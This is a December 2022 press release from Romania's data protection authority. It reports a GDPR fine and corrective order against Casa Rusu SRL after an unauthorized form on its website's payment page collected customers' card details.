09.12.2022
Sanction for the GDPR infringement
The National Supervisory Authority finalized in November 2022 an investigation at the controller Casa Rusu SRL and found the breach of the provisions of Article 25 paragraph (1), article 32 paragraph (1) letters b) and d) and of Article 32 paragraph (2) of Regulation (EU) 2016/679.
Therefore, the controller was sanctioned with fine in amount of Lei 9,883.60 (the equivalent of EUR 2,000).
The investigation was started following a data security breach notification that was submitted by Casa Rusu SRL based on the provisions of Article 33 of Regulation (EU) 2016/679.
Therefore, within the investigation it was found that the breach of the data processing security took place following the fact that within the on-line payment section of the website that the controller owns an unauthorized form through which banking data contained by the clients’ credit cards were collected was introduced.
Therefore, it resulted that this breach led to the unauthorized access to the processed data through the unauthorized disclosure and access to certain personal data, such as: the first name and last name of the credit card owner, the number of the card, the data and year of the expiry, CVC code.
It was found that the controller Casa Rusu SRL did not took adequate technical and organizational measures, both at the moment when establishing the processing means and at the one of the processing itself. Also, it resulted that the controller did not perform the testing, evaluation and periodical verification of the efficiency of the technical and organizational measures in order to guarantee the security of the processing with the purpose to efficiently implement the data protection principles.
Therefore, based on the provisions of Article 58 paragraph (2) of Regulation (EU) 2016/679 it was ordered to the controller also the corrective measure to review and update the technical and organizational measures implemented following the evaluation of the risk for the rights and freedoms of the persons, inclusively of the procedures regarding the electronic communication, in order for similar incidents of unauthorized disclosure of the personal data processed to be avoided.
Legal and Communication Department
A.N.S.P.D.C.P.